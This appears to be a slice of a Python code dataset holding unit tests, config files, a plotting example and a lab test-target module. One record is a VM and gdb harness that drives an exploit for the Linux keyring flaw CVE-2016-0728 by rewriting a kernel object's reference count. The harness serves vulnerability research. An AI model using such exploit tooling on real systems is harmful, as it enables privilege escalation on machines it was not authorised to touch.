compiler.PatternCompiler(flo).compile())\n self.assertEqual(6, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'c'),\n ('test', 'd'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ('c', 'test[$]'),\n ('d', 'test[$]'),\n ])\n self.assertEqual(set(['test']), set(g.no_predecessors_iter()))\n\n def test_linear_nested(self):\n a, b, c, d = test_utils.make_many(4)\n flo = lf.Flow(\"test\")\n flo.add(a, b)\n inner_flo = uf.Flow(\"test2\")\n inner_flo.add(c, d)\n flo.add(inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n\n sub_g = g.subgraph(['a', 'b'])\n self.assertFalse(sub_g.has_edge('b', 'a'))\n self.assertTrue(sub_g.has_edge('a', 'b'))\n self.assertEqual({'invariant': True}, sub_g.get_edge_data(\"a\", \"b\"))\n\n sub_g = g.subgraph(['c', 'd'])\n self.assertEqual(0, sub_g.number_of_edges())\n\n # This ensures that c and d do not start executing until after b.\n self.assertTrue(g.has_edge('b', 'test2'))\n self.assertTrue(g.has_edge('test2', 'c'))\n self.assertTrue(g.has_edge('test2', 'd'))\n\n def test_unordered_nested(self):\n a, b, c, d = test_utils.make_many(4)\n flo = uf.Flow(\"test\")\n flo.add(a, b)\n flo2 = lf.Flow(\"test2\")\n flo2.add(c, d)\n flo.add(flo2)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'test2'),\n ('test2', 'c'),\n ('c', 'd'),\n ('d', 'test2[$]'),\n ('test2[$]', 'test[$]'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ])\n\n def test_unordered_nested_in_linear(self):\n a, b, c, d = test_utils.make_many(4)\n inner_flo = uf.Flow('ut').add(b, c)\n flo = lf.Flow('lt').add(a, inner_flo, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(8, len(g))\n self.assertItemsEqual(g.edges(), [\n ('lt', 'a'),\n ('a', 'ut'),\n ('ut', 'b'),\n ('ut', 'c'),\n ('b', 'ut[$]'),\n ('c', 'ut[$]'),\n ('ut[$]', 'd'),\n ('d', 'lt[$]'),\n ])\n\n def test_graph(self):\n a, b, c, d = test_utils.make_many(4)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n compilation = compiler.PatternCompiler(flo).compile()\n self.assertEqual(6, len(compilation.execution_graph))\n self.assertEqual(8, compilation.execution_graph.number_of_edges())\n\n def test_graph_nested(self):\n a, b, c, d, e, f, g = test_utils.make_many(7)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n\n flo2 = lf.Flow('test2')\n flo2.add(e, f, g)\n flo.add(flo2)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(11, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'c'),\n ('test', 'd'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ('c', 'test[$]'),\n ('d', 'test[$]'),\n\n ('test', 'test2'),\n ('test2', 'e'),\n ('e', 'f'),\n ('f', 'g'),\n\n ('g', 'test2[$]'),\n ('test2[$]', 'test[$]'),\n ])\n\n def test_graph_nested_graph(self):\n a, b, c, d, e, f, g = test_utils.make_many(7)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n\n flo2 = gf.Flow('test2')\n flo2.add(e, f, g)\n flo.add(flo2)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(11, len(g))\n self.assertItemsEqual(g.edges(), [\n ('test', 'a'),\n ('test', 'b'),\n ('test', 'c'),\n ('test', 'd'),\n ('test', 'test2'),\n\n ('test2', 'e'),\n ('test2', 'f'),\n ('test2', 'g'),\n\n ('e', 'test2[$]'),\n ('f', 'test2[$]'),\n ('g', 'test2[$]'),\n\n ('test2[$]', 'test[$]'),\n ('a', 'test[$]'),\n ('b', 'test[$]'),\n ('c', 'test[$]'),\n ('d', 'test[$]'),\n ])\n\n def test_graph_links(self):\n a, b, c, d = test_utils.make_many(4)\n flo = gf.Flow(\"test\")\n flo.add(a, b, c, d)\n flo.link(a, b)\n flo.link(b, c)\n flo.link(c, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(6, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'a', {'invariant': True}),\n ('a', 'b', {'manual': True}),\n ('b', 'c', {'manual': True}),\n ('c', 'd', {'manual': True}),\n ('d', 'test[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n\n def test_graph_dependencies(self):\n a = test_utils.ProvidesRequiresTask('a', provides=['x'], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=['x'])\n flo = gf.Flow(\"test\").add(a, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(4, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'a', {'invariant': True}),\n ('a', 'b', {'reasons': set(['x'])}),\n ('b', 'test[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n\n def test_graph_nested_requires(self):\n a = test_utils.ProvidesRequiresTask('a', provides=['x'], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n c = test_utils.ProvidesRequiresTask('c', provides=[], requires=['x'])\n inner_flo = lf.Flow(\"test2\").add(b, c)\n flo = gf.Flow(\"test\").add(a, inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(7, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'a', {'invariant': True}),\n ('test2', 'b', {'invariant': True}),\n ('a', 'test2', {'reasons': set(['x'])}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'test[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], list(g.no_predecessors_iter()))\n self.assertItemsEqual(['test[$]'], list(g.no_successors_iter()))\n\n def test_graph_nested_provides(self):\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=['x'])\n b = test_utils.ProvidesRequiresTask('b', provides=['x'], requires=[])\n c = test_utils.ProvidesRequiresTask('c', provides=[], requires=[])\n inner_flo = lf.Flow(\"test2\").add(b, c)\n flo = gf.Flow(\"test\").add(a, inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(7, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'test2', {'invariant': True}),\n ('a', 'test[$]', {'invariant': True}),\n\n # The 'x' requirement is produced out of test2...\n ('test2[$]', 'a', {'reasons': set(['x'])}),\n\n ('test2', 'b', {'invariant': True}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ])\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n\n def test_empty_flow_in_linear_flow(self):\n flo = lf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n empty_flo = gf.Flow(\"empty\")\n flo.add(a, empty_flo, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertItemsEqual(g.edges(), [\n (\"lf\", \"a\"),\n (\"a\", \"empty\"),\n (\"empty\", \"empty[$]\"),\n (\"empty[$]\", \"b\"),\n (\"b\", \"lf[$]\"),\n ])\n\n def test_many_empty_in_graph_flow(self):\n flo = gf.Flow('root')\n\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=[])\n flo.add(a)\n\n b = lf.Flow('b')\n b_0 = test_utils.ProvidesRequiresTask('b.0', provides=[], requires=[])\n b_1 = lf.Flow('b.1')\n b_2 = lf.Flow('b.2')\n b_3 = test_utils.ProvidesRequiresTask('b.3', provides=[], requires=[])\n b.add(b_0, b_1, b_2, b_3)\n flo.add(b)\n\n c = lf.Flow('c')\n c_0 = lf.Flow('c.0')\n c_1 = lf.Flow('c.1')\n c_2 = lf.Flow('c.2')\n c.add(c_0, c_1, c_2)\n flo.add(c)\n\n d = test_utils.ProvidesRequiresTask('d', provides=[], requires=[])\n flo.add(d)\n\n flo.link(b, d)\n flo.link(a, d)\n flo.link(c, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n\n self.assertTrue(g.has_edge('root', 'a'))\n self.assertTrue(g.has_edge('root', 'b'))\n self.assertTrue(g.has_edge('root', 'c'))\n\n self.assertTrue(g.has_edge('b.0', 'b.1'))\n self.assertTrue(g.has_edge('b.1[$]', 'b.2'))\n self.assertTrue(g.has_edge('b.2[$]', 'b.3'))\n\n self.assertTrue(g.has_edge('c.0[$]', 'c.1'))\n self.assertTrue(g.has_edge('c.1[$]', 'c.2'))\n\n self.assertTrue(g.has_edge('a', 'd'))\n self.assertTrue(g.has_edge('b[$]', 'd'))\n self.assertTrue(g.has_edge('c[$]', 'd'))\n self.assertEqual(20, len(g))\n\n def test_empty_flow_in_nested_flow(self):\n flow = lf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n\n flow2 = lf.Flow(\"lf-2\")\n c = test_utils.ProvidesRequiresTask('c', provides=[], requires=[])\n d = test_utils.ProvidesRequiresTask('d', provides=[], requires=[])\n empty_flow = gf.Flow(\"empty\")\n flow2.add(c, empty_flow, d)\n flow.add(a, flow2, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flow).compile())\n for u, v in [('lf', 'a'), ('a', 'lf-2'),\n ('lf-2', 'c'), ('c', 'empty'),\n ('empty[$]', 'd'), ('d', 'lf-2[$]'),\n ('lf-2[$]', 'b'), ('b', 'lf[$]')]:\n self.assertTrue(g.has_edge(u, v))\n\n def test_empty_flow_in_graph_flow(self):\n flow = lf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=['a'], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=['a'])\n empty_flow = lf.Flow(\"empty\")\n flow.add(a, empty_flow, b)\n\n compilation = compiler.PatternCompiler(flow).compile()\n g = compilation.execution_graph\n self.assertTrue(g.has_edge(flow, a))\n self.assertTrue(g.has_edge(a, empty_flow))\n\n empty_flow_successors = g.successors(empty_flow)\n self.assertEqual(1, len(empty_flow_successors))\n empty_flow_terminal = empty_flow_successors[0]\n self.assertIs(empty_flow, empty_flow_terminal.flow)\n self.assertEqual(compiler.FLOW_END,\n g.node[empty_flow_terminal]['kind'])\n self.assertTrue(g.has_edge(empty_flow_terminal, b))\n\n def test_empty_flow_in_graph_flow_linkage(self):\n flow = gf.Flow('lf')\n a = test_utils.ProvidesRequiresTask('a', provides=[], requires=[])\n b = test_utils.ProvidesRequiresTask('b', provides=[], requires=[])\n empty_flow = lf.Flow(\"empty\")\n flow.add(a, empty_flow, b)\n flow.link(a, b)\n\n compilation = compiler.PatternCompiler(flow).compile()\n g = compilation.execution_graph\n self.assertTrue(g.has_edge(a, b))\n self.assertTrue(g.has_edge(flow, a))\n self.assertTrue(g.has_edge(flow, empty_flow))\n\n def test_checks_for_dups(self):\n flo = gf.Flow(\"test\").add(\n test_utils.DummyTask(name=\"a\"),\n test_utils.DummyTask(name=\"a\")\n )\n e = engines.load(flo)\n self.assertRaisesRegex(exc.Duplicate,\n '^Atoms with duplicate names',\n e.compile)\n\n def test_checks_for_dups_globally(self):\n flo = gf.Flow(\"test\").add(\n gf.Flow(\"int1\").add(test_utils.DummyTask(name=\"a\")),\n gf.Flow(\"int2\").add(test_utils.DummyTask(name=\"a\")))\n e = engines.load(flo)\n self.assertRaisesRegex(exc.Duplicate,\n '^Atoms with duplicate names',\n e.compile)\n\n def test_retry_in_linear_flow(self):\n flo = lf.Flow(\"test\", retry.AlwaysRevert(\"c\"))\n compilation = compiler.PatternCompiler(flo).compile()\n self.assertEqual(3, len(compilation.execution_graph))\n self.assertEqual(2, compilation.execution_graph.number_of_edges())\n\n def test_retry_in_unordered_flow(self):\n flo = uf.Flow(\"test\", retry.AlwaysRevert(\"c\"))\n compilation = compiler.PatternCompiler(flo).compile()\n self.assertEqual(3, len(compilation.execution_graph))\n self.assertEqual(2, compilation.execution_graph.number_of_edges())\n\n def test_retry_in_graph_flow(self):\n flo = gf.Flow(\"test\", retry.AlwaysRevert(\"c\"))\n compilation = compiler.PatternCompiler(flo).compile()\n g = compilation.execution_graph\n self.assertEqual(3, len(g))\n self.assertEqual(2, g.number_of_edges())\n\n def test_retry_in_nested_flows(self):\n c1 = retry.AlwaysRevert(\"c1\")\n c2 = retry.AlwaysRevert(\"c2\")\n inner_flo = lf.Flow(\"test2\", c2)\n flo = lf.Flow(\"test\", c1).add(inner_flo)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(6, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c1', {'invariant': True}),\n ('c1', 'test2', {'invariant': True, 'retry': True}),\n ('test2', 'c2', {'invariant': True}),\n ('c2', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'test[$]', {'invariant': True}),\n ])\n self.assertIs(c1, g.node['c2']['retry'])\n self.assertItemsEqual(['test'], list(g.no_predecessors_iter()))\n self.assertItemsEqual(['test[$]'], list(g.no_successors_iter()))\n\n def test_retry_in_linear_flow_with_tasks(self):\n c = retry.AlwaysRevert(\"c\")\n a, b = test_utils.make_many(2)\n flo = lf.Flow(\"test\", c).add(a, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(5, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c', {'invariant': True}),\n ('a', 'b', {'invariant': True}),\n ('c', 'a', {'invariant': True, 'retry': True}),\n ('b', 'test[$]', {'invariant': True}),\n ])\n\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n self.assertIs(c, g.node['a']['retry'])\n self.assertIs(c, g.node['b']['retry'])\n\n def test_retry_in_unordered_flow_with_tasks(self):\n c = retry.AlwaysRevert(\"c\")\n a, b = test_utils.make_many(2)\n flo = uf.Flow(\"test\", c).add(a, b)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(5, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c', {'invariant': True}),\n ('c', 'a', {'invariant': True, 'retry': True}),\n ('c', 'b', {'invariant': True, 'retry': True}),\n ('b', 'test[$]', {'invariant': True}),\n ('a', 'test[$]', {'invariant': True}),\n ])\n\n self.assertItemsEqual(['test'], list(g.no_predecessors_iter()))\n self.assertItemsEqual(['test[$]'], list(g.no_successors_iter()))\n self.assertIs(c, g.node['a']['retry'])\n self.assertIs(c, g.node['b']['retry'])\n\n def test_retry_in_graph_flow_with_tasks(self):\n r = retry.AlwaysRevert(\"r\")\n a, b, c = test_utils.make_many(3)\n flo = gf.Flow(\"test\", r).add(a, b, c).link(b, c)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'r', {'invariant': True}),\n ('r', 'a', {'invariant': True, 'retry': True}),\n ('r', 'b', {'invariant': True, 'retry': True}),\n ('b', 'c', {'manual': True}),\n ('a', 'test[$]', {'invariant': True}),\n ('c', 'test[$]', {'invariant': True}),\n ])\n\n self.assertItemsEqual(['test'], g.no_predecessors_iter())\n self.assertItemsEqual(['test[$]'], g.no_successors_iter())\n self.assertIs(r, g.node['a']['retry'])\n self.assertIs(r, g.node['b']['retry'])\n self.assertIs(r, g.node['c']['retry'])\n\n def test_retries_hierarchy(self):\n c1 = retry.AlwaysRevert(\"c1\")\n c2 = retry.AlwaysRevert(\"c2\")\n a, b, c, d = test_utils.make_many(4)\n inner_flo = lf.Flow(\"test2\", c2).add(b, c)\n flo = lf.Flow(\"test\", c1).add(a, inner_flo, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(10, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c1', {'invariant': True}),\n ('c1', 'a', {'invariant': True, 'retry': True}),\n ('a', 'test2', {'invariant': True}),\n ('test2', 'c2', {'invariant': True}),\n ('c2', 'b', {'invariant': True, 'retry': True}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'd', {'invariant': True}),\n ('d', 'test[$]', {'invariant': True}),\n ])\n self.assertIs(c1, g.node['a']['retry'])\n self.assertIs(c1, g.node['d']['retry'])\n self.assertIs(c2, g.node['b']['retry'])\n self.assertIs(c2, g.node['c']['retry'])\n self.assertIs(c1, g.node['c2']['retry'])\n self.assertIsNone(g.node['c1'].get('retry'))\n\n def test_retry_subflows_hierarchy(self):\n c1 = retry.AlwaysRevert(\"c1\")\n a, b, c, d = test_utils.make_many(4)\n inner_flo = lf.Flow(\"test2\").add(b, c)\n flo = lf.Flow(\"test\", c1).add(a, inner_flo, d)\n\n g = _replicate_graph_with_names(\n compiler.PatternCompiler(flo).compile())\n self.assertEqual(9, len(g))\n self.assertItemsEqual(g.edges(data=True), [\n ('test', 'c1', {'invariant': True}),\n ('c1', 'a', {'invariant': True, 'retry': True}),\n ('a', 'test2', {'invariant': True}),\n ('test2', 'b', {'invariant': True}),\n ('b', 'c', {'invariant': True}),\n ('c', 'test2[$]', {'invariant': True}),\n ('test2[$]', 'd', {'invariant': True}),\n ('d', 'test[$]', {'invariant': True}),\n ])\n self.assertIs(c1, g.node['a']['retry'])\n self.assertIs(c1, g.node['d']['retry'])\n self.assertIs(c1, g.node['b']['retry'])\n self.assertIs(c1, g.node['c']['retry'])\n self.assertIsNone(g.node['c1'].get('retry'))\n"} {"ext": "py", "sha": "1a310d14fbb512fb7d3d75bf99d7b451b11e34bf", "content": "#!/usr/bin/env python\n\ncommand += testshade (\"-g 128 128 --layer testlay -param:lockgeom=0 scale 5.0 test -iters 2 -reparam testlay scale 15.0 -od uint8 -o Cout out.tif\")\noutputs = [ \"out.txt\", \"out.tif\" ]\n# expect a few LSB failures\nfailthresh = 0.004\nfailpercent = 0.05\n"} {"ext": "py", "sha": "1a310d203832ad7c7c8a40c8d3a6aa8c2ea91551", "content": "#!/usr/bin/python\nfrom pwn import *\nimport sys\nsys.path.append('/home/ww9210/develop/vminstance')\nsys.path.append('/home/ww9210/develop/dataflowanalyzer')\nimport vminstance\nimport dataflowanalyzer\nimport subprocess\nimport re\nimport random\n\ndef test_0728(gdb_port=random.randint(15000,16000)):\n context.update(arch = 'amd64')\n start_time = time.time()\n vm = vminstance.vmInstance(qemu_config_file = \\\n '/home/ww9210/develop/kuafffp/poc_qemu_config/cve-2016-0728-nokasan.cfg' \\\n , gdb_deamon_port = gdb_port\\\n , log_filename = 'vm_log_0728_ce.txt'\\\n , start_grace_time = 5\\\n , enable_kvm = True\\\n , two_cpus = True\\\n )\n vm.run_gdb_deamon()\n vm.run()\n vm.connect()\n\n vm.s.put('exp_boost')\n sh = vm.s.shell('/bin/sh')\n sh.sendline('chmod +x ./exp_boost')\n sleep(1)\n\n gdb = dataflowanalyzer.DebuggerGdb(gdbport = gdb_port, qemu_gdbport = vm.qemu_config.gdb_port\\\n , vmlinux_path = vm.qemu_config.vmlinux_path)\n\n gdb.connectGdb()\n gdb.loadVmlinux()\n gdb.connectQemu()\n gdb.b(0xffffffff812dcca8)\n \"\"\"\n 0xffffffff812dcca2 <join_session_keyring+114>: mov rsi,r13\n 0xffffffff812dcca5 <join_session_keyring+117>: mov rdi,r12\n 0xffffffff812dcca8 <join_session_keyring+120>: call 0xffffffff812dc8b0 <install_session_keyring_to_cred>\n \"\"\"\n gdb.b('wait_for_key_construction')\n gdb.c()\n \n sh.sendline('./exp_boost ww9210')\n print 'catching...'\n gdb.catch()\n obj_base = gdb.get_reg('rsi')\n print 'object base is: ', hex(obj_base)\n gdb.delete(1)\n gdb.cmd('watch *'+hex(obj_base))\n for i in range(5):\n gdb.c()\n cont = gdb.catch()\n print cont\n if 'key_put' in cont and '0xffffffff812d8d28' in cont and gdb.xgx(obj_base)&0xffffffff == 2:\n gdb.set_int(obj_base, 1)\n gdb.delete(2)\n gdb.delete(3)\n gdb.b(0xffffffff812d8bd8)\n gdb.c()\n break\n\n\n print 'object base', hex(obj_base)\n gdb.Gdbinteractive()\n sh.interactive()\n\n vm.shutdown()\n\nif __name__ == '__main__':\n test_0728()\n"} {"ext": "py", "sha": "1a310d4d247ce5efed3b60e838880a331fd5168d", "content": "from graphs.graph import Graph\n\ndef get_edges(g,verticies_list):\n sum=0\n for i in range(0, len(verticies_list)-1):\n found=False\n for neighbor in g.get_neighbors(verticies_list[i]):\n if verticies_list[i+1] == neighbor[0]:\n sum+=neighbor[1]\n found=True\n if found == False :\n return(False,0) \n return (True, sum)\n \n "} {"ext": "py", "sha": "1a310e449d16efbc2d2233e2f79f55b5a509bd02", "content": "# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n\nimport os\nimport pathlib\nimport sys\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n# see https://pypi.org/project/setuptools-scm/ for details\nfrom pkg_resources import get_distribution\n\n\nprint(\"python exec:\", sys.executable)\nprint(\"sys.path:\", sys.path)\nroot = pathlib.Path(__file__).parent.parent.absolute()\nos.environ[\"PYTHONPATH\"] = str(root)\nsys.path.insert(0, str(root))\n\nimport ragmac_xdem # isort:skip\n\n# -- Project information -----------------------------------------------------\n\nproject = \"ragmac_xdem\"\ncopyright = \"2021, Amaury Dehecq\"\nauthor = \"Amaury Dehecq\"\n\nrelease = get_distribution(\"ragmac_xdem\").version\n# for example take major/minor\nversion = \".\".join(release.split(\".\")[:2])\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n \"sphinx.ext.autodoc\",\n \"sphinx.ext.viewcode\",\n \"sphinx.ext.napoleon\",\n \"nbsphinx\",\n \"recommonmark\",\n \"sphinx.ext.mathjax\",\n \"sphinx.ext.autosummary\",\n \"sphinx.ext.extlinks\",\n \"sphinx.ext.intersphinx\",\n \"numpydoc\",\n \"nbsphinx\",\n \"IPython.sphinxext.ipython_directive\",\n \"IPython.sphinxext.ipython_console_highlighting\",\n \"sphinxcontrib.srclinks\",\n]\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = [\"_templates\"]\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = [\"_build\", \"**.ipynb_checkpoints\", \"Thumbs.db\", \".DS_Store\"]\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\nhtml_theme = \"pangeo\"\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\nhtml_static_path = [\"_static\"]\n\n\n# -- nbsphinx specific options ----------------------------------------------\n# this allows notebooks to be run even if they produce errors.\nnbsphinx_allow_errors = True\n"} {"ext": "py", "sha": "1a310ec87ab9e27b22a71ab673690cc8ac515bfb", "content": "# coding=utf-8\n# Copyright 2022 The TensorFlow Datasets Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"WSC273 dataset.\"\"\"\n\nfrom tensorflow_datasets.text.wsc273.wsc273 import Wsc273\n"} {"ext": "py", "sha": "1a310f857a6be17bfe2bdc86377fd0c3a7e31ad9", "content": "from webdnn.graph.attribute import Attribute\n\n\nclass Input(Attribute):\n \"\"\"Input\n Attribute for input variable of graph\n \"\"\"\n pass\n"} {"ext": "py", "sha": "1a310f8c3a5bd83b913257ee39d720b1b8f07b5a", "content": "\"\"\"\n===============\nSubplots Adjust\n===============\n\nAdjusting the spacing of margins and subplots using\n:func:`~matplotlib.pyplot.subplots_adjust`.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# Fixing random state for reproducibility\nnp.random.seed(19680801)\n\n\nplt.subplot(211)\nplt.imshow(np.random.random((100, 100)), cmap=plt.cm.BuPu_r)\nplt.subplot(212)\nplt.imshow(np.random.random((100, 100)), cmap=plt.cm.BuPu_r)\n\nplt.subplots_adjust(bottom=0.1, right=0.8, top=0.9)\ncax = plt.axes([0.85, 0.1, 0.075, 0.8])\nplt.colorbar(cax=cax)\nplt.show()\n"} {"ext": "py", "sha": "1a311019e40440aa46c857ec175ac1bb91f27758", "content": "#! /usr/bin/python2\n#\n# Copyright (c) 2017 Intel Corporation\n#\n# SPDX-License-Identifier: Apache-2.0\n#\n\n\nimport codecs\nimport os\nimport shutil\nimport socket\nimport string\nimport subprocess\nimport sys\nimport telnetlib\nimport tempfile\nimport time\n\nimport serial\n\nimport commonl\nimport ttbl\nimport ttbl.cm_loopback\nimport ttbl.cm_serial\nimport ttbl.config\nimport ttbl.pc_ykush\nimport ttbl.tt_qemu\n\n\nclass tt_serial(\n ttbl.test_target,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial):\n \"\"\"A generic test target, power switched with a pluggable power\n control implementation and with one or more serial ports.\n\n Example configuration::\n\n >>> ttbl.config.target_add(\n >>> tt_serial(\n >>> \"minnow-01\",\n >>> power_control = ttbl.pc.dlwps7(\"http://URL\"),\n >>> serial_ports = [\n >>> { \"port\": \"/dev/tty-minnow-01\", \"baudrate\": 115200 }\n >>> ]),\n >>> tags = {\n >>> 'build_only': True,\n >>> 'bsp_models': { 'x86': None },\n >>> 'bsps': {\n >>> 'x86': dict(board = 'minnowboard',\n >>> console = \"\")\n >>> }\n >>> },\n >>> target_type = \"minnow_max\")\n\n With a udev configuration that generated the ``/dev/tty-minnow-01``\n name such as ``/etc/udev/rules.d/SOMETHING.rules``::\n\n SUBSYSTEM == \"tty\", ENV{ID_SERIAL_SHORT} == \"SERIALNUMBER\", \\\n GROUP = \"SOMEGROUP\", MODE = \"0660\", \\\n SYMLINK += \"tty-minnow-01\"\n\n :param power_control: an instance of an implementation\n of the power_control_mixin used to implement power control for\n the target. Use ttbl.pc.manual() for manual power control that\n requires user interaction.\n\n :param serial_ports: list of serial port dictionaries, specified\n as for :func:`serial.serial_for_url` with a couple of extras as\n specified in :class:`ttbl.cm_serial`.\n\n \"\"\"\n def __init__(self, id, power_control, serial_ports,\n _tags = None, target_type = None):\n ttbl.test_target.__init__(self, id, _tags = _tags, _type = target_type)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.cm_serial.cm_serial.__init__(self, self.state_dir, serial_ports)\n\n\nclass tt_power(\n ttbl.test_target,\n ttbl.tt_power_control_mixin):\n def __init__(self, id, power_control, power = None):\n \"\"\"\n A generic test target for just power control\n\n >>> ttbl.config.target_add(\n >>> ttbl.tt.tt_power(name, ttbl.pc.dlwps7(URL), power = None),\n >>> tags = dict(idle_poweroff = 0))\n\n :param bool power: if specified, switch the power of the target\n upon initialization; *True* powers it on, *False* powers it\n off, *None* does nothing.\n\n \"\"\"\n assert isinstance(id, basestring)\n ttbl.test_target.__init__(self, id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n if power == True:\n self.log.info(\"Powering on per configuration\")\n self._power_on_do()\n elif power == False:\n self.log.info(\"Powering off per configuration\")\n self._power_off_do()\n\nclass tt_power_lc(\n ttbl.test_target,\n ttbl.cm_loopback.cm_loopback,\n ttbl.tt_power_control_mixin):\n def __init__(self, id, power_control, power = None, consoles = None):\n \"\"\"\n A generic test target for just power control and fake loopback consoles\n\n >>> ttbl.config.target_add(\n >>> ttbl.tt.tt_power(name, ttbl.pc.dlwps7(URL), power = None))\n\n :param bool power: if specified, switch the power of the target\n upon initialization; *True* powers it on, *False* powers it\n off, *None* does nothing.\n\n :param consoles: see :class:`ttbl.cm_loopback.cm_loopback`.\n\n \"\"\"\n ttbl.test_target.__init__(self, id)\n ttbl.tt_power_control_mixin.__init__(self, power_control)\n ttbl.cm_loopback.cm_loopback.__init__(self, self.state_dir, consoles)\n if power == True:\n self.log.info(\"Powering on per configuration\")\n self._power_on_do()\n elif power == False:\n self.log.info(\"Powering off per configuration\")\n self._power_off_do()\n\n\n\nclass tt_arduino2(\n ttbl.test_target,\n ttbl.test_target_images_mixin,\n ttbl.tt_power_control_mixin,\n ttbl.cm_serial.cm_serial):\n #: Command to call to execute the BOSSA command line flasher\n 